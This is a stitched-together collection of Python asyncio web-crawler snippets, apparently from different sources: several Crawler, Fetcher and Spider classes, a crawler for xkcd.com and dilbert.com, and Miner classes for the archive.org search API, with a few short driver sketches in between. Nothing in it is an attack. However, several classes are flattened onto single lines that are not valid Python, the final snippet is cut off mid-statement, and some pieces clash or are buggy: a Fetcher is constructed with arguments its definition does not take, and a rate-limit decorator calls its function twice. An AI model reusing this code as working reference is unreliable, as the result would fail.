class WebCrawler(object):
    def __init__(self, url, max_requests, loop, max_coroutines=100):
        self.url = url
        self.max_requests = max_requests
        self.links_visited = set()
        self.max_coroutines = max_coroutines
        self.queue = Queue()
        self.loop = loop

    @asyncio.coroutine
    def work(self):
        while True:
            url = yield from self.queue.get()
            fetcher = Fetcher(url, self)
            yield from fetcher.connect()
            self.queue.task_done()

    @asyncio.coroutine
    def web_crawler(self):
        self.queue.put_nowait(self.url)
        self.session = aiohttp.ClientSession(loop=self.loop)
        workers = [
            asyncio.Task(self.work())
            for _ in range(self.max_coroutines)
        ]
        yield from self.queue.join()
        for worker in workers:
            worker.cancel()
        yield from self.session.close()
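A minimal driver sketch for the class above. It assumes the WebCrawler shown here and a compatible Fetcher (with a connect() coroutine) are defined in the same module; the root URL and the limits are illustrative, not part of the original snippet.

import asyncio

loop = asyncio.get_event_loop()
crawler = WebCrawler('http://example.com/', max_requests=100, loop=loop,
                     max_coroutines=10)
try:
    # Runs until the queue has been fully drained by the workers.
    loop.run_until_complete(crawler.web_crawler())
finally:
    loop.close()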
class Fetcher:
    def __init__(self, loop):
        self.num_worker = 10
        self.loop = loop
        self.q = Queue()
        self.seen_urls = set(['/'])

    @asyncio.coroutine
    def manager(self):
        workers = [
            self.loop.create_task(self.worker())
            for _ in range(self.num_worker)
        ]
        yield from self.q.put('/')
        # wait until q is empty
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def worker(self):
        while True:
            url = yield from self.q.get()
            sock = socket.socket(socket.AF_INET)
            sock.setblocking(False)
            try:
                yield from self.loop.sock_connect(sock, ('dilbert.com', 80))
            except BlockingIOError:
                pass
            request = 'GET {} HTTP/1.1\r\nHost: dilbert.com\r\nConnection: close\r\n\r\n'.format(url)
            yield from self.loop.sock_sendall(sock, request.encode('ascii'))
            response = b''
            chunk = yield from self.loop.sock_recv(sock, 4096)
            while chunk:
                response += chunk
                chunk = yield from self.loop.sock_recv(sock, 4096)
            links = yield from self.parse_link(response)
            for link in links.difference(self.seen_urls):
                yield from self.q.put(link)
            self.seen_urls.update(links)
            self.q.task_done()
            sock.close()

    @asyncio.coroutine
    def parse_link(self, response):
        links = set()
        d = pq(response)
        anchors = d("a")
        for anchor in anchors:
            href = anchor.get("href")
            if href and href[:5] == "http:" and href[7:14] == "dilbert":
                links.add(href[6:])
        return links
class Crawler:
    def __init__(self, root_url, max_redirect):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()
        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        self.session = aiohttp.ClientSession(loop=loop)
        # Put (URL, max_redirect) in the queue.
        self.q.put_nowait((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all work is done."""
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks)]
        # When all work is done, exit.
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()
            # Download page and add new links to self.q.
            yield from self.fetch(url, max_redirect)
            self.q.task_done()


# Begin crawling from http://xkcd.com
loop = asyncio.get_event_loop()
crawler = Crawler('http://xkcd.com', max_redirect=10)
loop.run_until_complete(crawler.crawl())
class Crawler:
    def __init__(self, root_url, max_redirect):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()
        self.session = aiohttp.ClientSession(loop=loop)
        self.q.put_nowait((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks)]
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()
            yield from self.fetch(url, max_redirect)
            # on multithreading see: https://segmentfault.com/q/1010000009765115
            self.q.task_done()

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        response = yield from self.session.get(url, allow_redirects=False)
        try:
            if is_redirect(response):
                if max_redirect > 0:
                    next_url = response.headers['location']
                    if next_url in self.seen_urls:
                        return
                    self.seen_urls.add(next_url)
                    self.q.put_nowait((next_url, max_redirect - 1))
            else:
                links = yield from self.parse_links(response)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()
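Several of the crawlers here call an is_redirect() helper that is not shown in the snippets. A minimal sketch of what such a helper might look like, assuming a redirect is recognized purely by its HTTP status code:

def is_redirect(response):
    # 3xx statuses that carry a Location header the crawler should follow.
    return response.status in (300, 301, 302, 303, 307)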
def worker(get, queue: asyncio.JoinableQueue, output):
    while True:
        item = yield from queue.get()
        # This is horrible and I feel bad for writing it, believe me
        try:
            if item is None:
                return
            chunks, id = item
            for i in range(id, id + chunks):
                try:
                    data = yield from get("item/{}".format(i))
                    output(data)
                except Exception:
                    pass
        except Exception as e:
            pass
        finally:
            queue.task_done()
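A hedged sketch of how this worker might be driven on the same pre-async/await asyncio the examples target: items are (chunks, id) tuples, one None sentinel per worker tells it to exit, and queue.join() waits until everything has been processed. fake_get and the item counts are placeholders, and plain asyncio.Queue stands in for JoinableQueue, which was folded into Queue in Python 3.4.4.

import asyncio

@asyncio.coroutine
def fake_get(path):
    # Stand-in for a real HTTP fetch.
    yield from asyncio.sleep(0.01)
    return 'data for {}'.format(path)

@asyncio.coroutine
def main(loop, num_workers=3):
    queue = asyncio.Queue(loop=loop)
    tasks = [loop.create_task(worker(fake_get, queue, print))
             for _ in range(num_workers)]
    yield from queue.put((5, 100))   # items 100..104
    yield from queue.put((3, 200))   # items 200..202
    for _ in tasks:
        yield from queue.put(None)   # one stop sentinel per worker
    yield from queue.join()
    yield from asyncio.wait(tasks)

loop = asyncio.get_event_loop()
loop.run_until_complete(main(loop))
loop.close()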
class Spider:
    def __init__(self, max_tries=30, max_tasks=10, timeout=5, rootDir=os.getcwd()):
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.loop = asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.timeout = timeout
        self.rootDir = rootDir

    def close(self):
        self.session.close()

    def append_request(self, request):
        self.q.put_nowait(request)

    @asyncio.coroutine
    def _get_request(self):
        r = yield from self.q.get()
        return r

    @asyncio.coroutine
    def fetch(self, request_type, url, params, data):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                print("try %s---->%d times" % (url, tries))
                with aiohttp.Timeout(self.timeout):
                    response = yield from self.session.get(url, params=params)
                if response.status == 200:
                    content_type = response.headers.get('content-type')
                    if content_type in CONTENT_TYPE_TEXT:
                        with aiohttp.Timeout(self.timeout):
                            content = yield from response.text(encoding='GBK')
                    else:
                        with aiohttp.Timeout(self.timeout):
                            content = yield from response.read()
                    break
            except asyncio.TimeoutError:
                print("timeout")
            except aiohttp.ClientError as client_error:
                print("client error")
            except Exception:
                print("unknown error")
            tries += 1
        else:
            print("try %s---->more than %d times, quit" % (url, tries))
            return None
        response.release()
        return content

    @asyncio.coroutine
    def _work(self):
        """Process queue items forever."""
        try:
            while True:
                r = yield from self._get_request()
                content = yield from self.fetch(r.request_type, r.url,
                                                r.params, r.data)
                if content:
                    r.handle_func(content)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def work(self):
        yield from self._work()

    @asyncio.coroutine
    def spider(self):
        """Run the spider until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        yield from self.q.join()
        for w in workers:
            w.cancel()
class Crawler: def __init__(self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, *, loop=None): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z', host): self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None def close(self): self.session.close() def host_okay(self, host): host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() # Replace href with (?:href|src) to follow image links. urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get( url, allow_redirects=False) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. 
LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: yield from response.release() @asyncio.coroutine def work(self): # Process queue items forever. try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): # Add a URL to the queue if not seen before. if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): # Run the crawler until all finished. workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
class Crawler:
    def __init__(self, roots, exclude=None, strict=True, max_redirect=10,
                 max_tries=4, max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        self.session.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()
        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}
            if content_type:
                content_type, pdict = cgi.parse_header(content_type)
            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()
                urls = set(re.findall(r"""(?i)href=["']?([^\s"'<>]+)""", text))
                if urls:
                    logger.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)
        stats = FetchStatistic(url=response.url,
                               next_url=None,
                               status=response.status,
                               exception=None,
                               size=len(body),
                               content_type=content_type,
                               encoding=encoding,
                               num_urls=len(links),
                               num_new_urls=len(links - self.seen_urls))
        return stats, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url,
                                                       allow_redirects=False)
                if tries > 1:
                    logger.info('try %r for %r success', tries, url)
                break
            except aiohttp.ClientError as client_error:
                logger.info('try %r for %r raised %r', tries, url,
                            client_error)
                exception = client_error
            tries += 1
        else:
            logger.error('%r failed after %r tries', url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return
        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))
                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    logger.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    logger.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            pass

    @asyncio.coroutine
    def work(self):
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            logger.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            logger.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        if max_redirect is None:
            max_redirect = self.max_redirect
        logger.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
class Fetcher(object):
    """Async page fetcher."""

    def __init__(self, max_tasks=20, max_redirect=10):
        self.max_tasks = max_tasks
        self.max_redirect = max_redirect
        self.q = Queue()
        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        loop = asyncio.get_event_loop()
        self.session = aiohttp.ClientSession(loop=loop)
        loop.run_until_complete(self.fetch())

    @asyncio.coroutine
    def fetch(self):
        """Run the fetcher until all work is done."""
        # Create workers that fetch pages
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks // 2)]
        # Create seeders that take URLs from redis and add them to own queue
        seeders = [asyncio.Task(self.get_seeds())
                   for _ in range(self.max_tasks // 2)]
        # When all work is done, exit.
        yield from self.q.join()
        for s in seeders:
            s.cancel()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            # Get URLs from own queue
            url = yield from self.q.get()
            # Download page
            yield from self.fetch_url(url)
            self.q.task_done()

    @asyncio.coroutine
    def fetch_url(self, url):
        # Handle redirects ourselves.
        response = yield from self.session.get(url, allow_redirects=True)
        try:
            # Handle the response
            pass
        finally:
            # Return connection to pool.
            yield from response.release()

    @asyncio.coroutine
    def get_seeds(self):
        while True:
            pass
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. """ def __init__(self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, *, loop=None): # The lone * indicates that all following arguments are keyword-only arguments self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z', host): # \A and \Z are similar to ^ and $, \d represents the digital.(0.0.0.0) self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None def close(self): """Close resources.""" self.session.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. 
""" return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get( url, allow_redirects=False) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: yield from response.release() @asyncio.coroutine def work(self): """Process queue items forever.""" try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) 
self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): """Run the crawler until all finished.""" workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
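A hedged driver sketch for the Crawler above, assuming it lives in one module together with the helpers the snippet relies on (FetchStatistic, lenient_host, is_redirect, LOGGER, Queue); the root URL and task count are illustrative.

import asyncio

loop = asyncio.get_event_loop()
crawler = Crawler(['http://xkcd.com/'], max_tasks=10, loop=loop)
try:
    # Workers drain the queue; crawl() returns once q.join() completes.
    loop.run_until_complete(crawler.crawl())
finally:
    crawler.close()   # close the aiohttp session
    loop.close()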
class Miner(object): def __init__(self, loop=None, max_tasks=None, retries=None, secure=None, hosts=None, params=None, config=None, config_file=None, access=None, secret=None, debug=None): # Set default values for kwargs. loop = asyncio.get_event_loop() if not loop else loop max_tasks = 100 if not max_tasks else max_tasks max_retries = 10 if not retries else retries protocol = 'http://' if not secure else 'https://' config = get_config(config, config_file) access = config.get('s3', {}).get('access', access) secret = config.get('s3', {}).get('secret', secret) debug = True if debug else False self.max_tasks = max_tasks self.max_retries = max_retries self.protocol = protocol self.hosts = hosts self.config = config self.access = access self.debug = debug self.cookies = config.get('cookies', {}) # Asyncio/Aiohttp settings. self.connector = aiohttp.TCPConnector(share_cookies=True, loop=loop) self.connector.update_cookies(self.cookies) self.loop = loop self.q = Queue(1000, loop=self.loop) self.q = Queue(loop=self.loop) # Require valid access key! self.assert_s3_keys_valid(access, secret) # Rate limiting. self._max_per_second = self.get_global_rate_limit() self._min_interval = 1.0 / float(self._max_per_second) self._last_time_called = 0.0 def close(self): self.connector.close() self.loop.stop() self.loop.close() def assert_s3_keys_valid(self, access, secret): url = '{}s3.us.archive.org?check_auth=1'.format(self.protocol) r = urllib.request.Request(url) r.add_header('Authorization', 'LOW {0}:{1}'.format(access, secret)) f = urllib.request.urlopen(r) j = json.loads(f.read().decode('utf-8')) if j.get('authorized') is not True: raise AuthenticationError(j.get('error')) def get_global_rate_limit(self): """Get the global rate limit per client. :rtype: int :returns: The global rate limit for each client. """ r = urllib.request.urlopen('https://archive.org/metadata/iamine-rate-limiter') j = json.loads(r.read().decode('utf-8')) return int(j.get('metadata', {}).get('rate_per_second', 300)) def _rate_limited(): """A rate limit decorator for limiting the number of times the decorated :class:`Miner` method can be called. Limits are set in :attr:`Miner._max_per_second`. """ def decorate(func): def rate_limited_func(self, *args, **kwargs): elapsed = time.monotonic() - self._last_time_called self.left_to_wait = self._min_interval - elapsed if self.left_to_wait > 0: time.sleep(self.left_to_wait) func(self, *args, **kwargs) self._last_time_called = time.monotonic() yield from func(self, *args, **kwargs) return rate_limited_func return decorate @_rate_limited() def make_rate_limited_request(self, request): yield from request.make_request() @asyncio.coroutine def work(self): while True: request = yield from self.q.get() yield from self.make_rate_limited_request(request) self.q.task_done() @asyncio.coroutine def q_requests(self, requests): for req in requests: self.q.put_nowait(req) @asyncio.coroutine def mine(self, requests): workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] yield from self.q_requests(requests) yield from self.q.join() yield from asyncio.sleep(1) while not self.q.empty(): yield from asyncio.sleep(1) for w in workers: w.cancel() yield from asyncio.sleep(.5)
class SearchMiner(ItemMiner): def __init__(self, **kwargs): super(SearchMiner, self).__init__(**kwargs) # Item mining queue. self.iq = Queue(1000, loop=self.loop) def get_search_params(self, query, params): default_rows = 500 search_params = { 'q': 'all:1', 'page': 1, 'output': 'json', } if params: search_params.update({k: v for k, v in params.items() if v}) if query: search_params['q'] = query if 'rows' not in search_params: search_params['rows'] = default_rows return search_params def get_search_info(self, params): url = make_url('/advancedsearch.php?', self.protocol, self.hosts) p = deepcopy(params) p['rows'] = 0 params = urllib.parse.urlencode(p) url += params f = urllib.request.urlopen(url) return json.loads(f.read().decode('utf-8')) @asyncio.coroutine def _handle_search_results(self, resp, params=None, callback=None): j = yield from resp.json(encoding='utf-8') resp.close() identifiers = [] for doc in j.get('response', {}).get('docs', []): if not doc.get('identifier'): continue identifiers.append(doc['identifier']) for req in metadata_requests(identifiers, params, callback, self): self.iq.put_nowait(req) def search_requests(self, query=None, params=None, callback=None, mine_ids=None): """Mine Archive.org search results. :param query: The Archive.org search query to yield results for. Refer to https://archive.org/advancedsearch.php#raw for help formatting your query. :type query: str :param params: The URL parameters to send with each request sent to the Archive.org Advancedsearch Api. :type params: dict """ # If mining ids, devote half the workers to search and half to item mining. if mine_ids: self.max_tasks = self.max_tasks/2 # When mining id's, the only field we need returned is "identifier". if mine_ids and params: params = dict((k, v) for k, v in params.items() if 'fl' not in k) params['fl[]'] = 'identifier' # Make sure "identifier" is always returned in search results. fields = [k for k in params if 'fl' in k] if (len(fields) == 1) and (not any('identifier' == params[k] for k in params)): # Make sure to not overwrite the existing fl[] key. i = 0 while params.get('fl[{}]'.format(i)): i += 1 params['fl[{}]'.format(i)] = 'identifier' search_params = self.get_search_params(query, params) url = make_url('/advancedsearch.php', self.protocol, self.hosts) search_info = self.get_search_info(search_params) total_results = search_info.get('response', {}).get('numFound', 0) total_pages = (int(total_results/search_params['rows']) + 1) for page in range(1, (total_pages + 1)): params = deepcopy(search_params) params['page'] = page if not callback and mine_ids: callback = self._handle_search_results req = MineRequest('GET', url, self.access, callback=callback, max_retries=self.max_retries, debug=self.debug, params=params, connector=self.connector) yield req @asyncio.coroutine def mine_items(self): while True: request = yield from self.iq.get() yield from self.make_rate_limited_request(request) self.iq.task_done() @asyncio.coroutine def search(self, query=None, params=None, callback=None, mine_ids=None): search_requests = self.search_requests(query, params, callback, mine_ids) if mine_ids: workers = [asyncio.Task(self.mine_items(), loop=self.loop) for _ in range(self.max_tasks)] yield from self.mine(search_requests) # Wait a bit for all connections to close. yield from asyncio.sleep(1) if mine_ids: for w in workers: w.cancel()
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. """ def __init__(self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, loop=None): get_domain(roots) if not os.path.exists(os.path.dirname(path)): os.makedirs(os.path.dirname(path)) with open(path, 'w') as temp_file: print('writing') temp_file.write('Domain name:') temp_file.write(roots) temp_file.write('\n \n') temp_file.close() self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.connector = aiohttp.TCPConnector(loop=self.loop) self.root_domains = set() # for root in roots: # parts = urllib.parse.urlparse(root) # host, port = urllib.parse.splitport(parts.netloc) # if not host: # continue # if re.match(r'\A[\d\.]*\Z', host): # self.root_domains.add(host) # else: ## host = host.lower() # if self.strict: # self.root_domains.add(host) # else: # self.root_domains.add(lenient_host(host)) # for root in roots: # print("true root") # print(root) # self.add_url(root) self.add_url(roots) self.t0 = time.time() self.t1 = None def close(self): """Close resources.""" self.connector.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() if response.status == 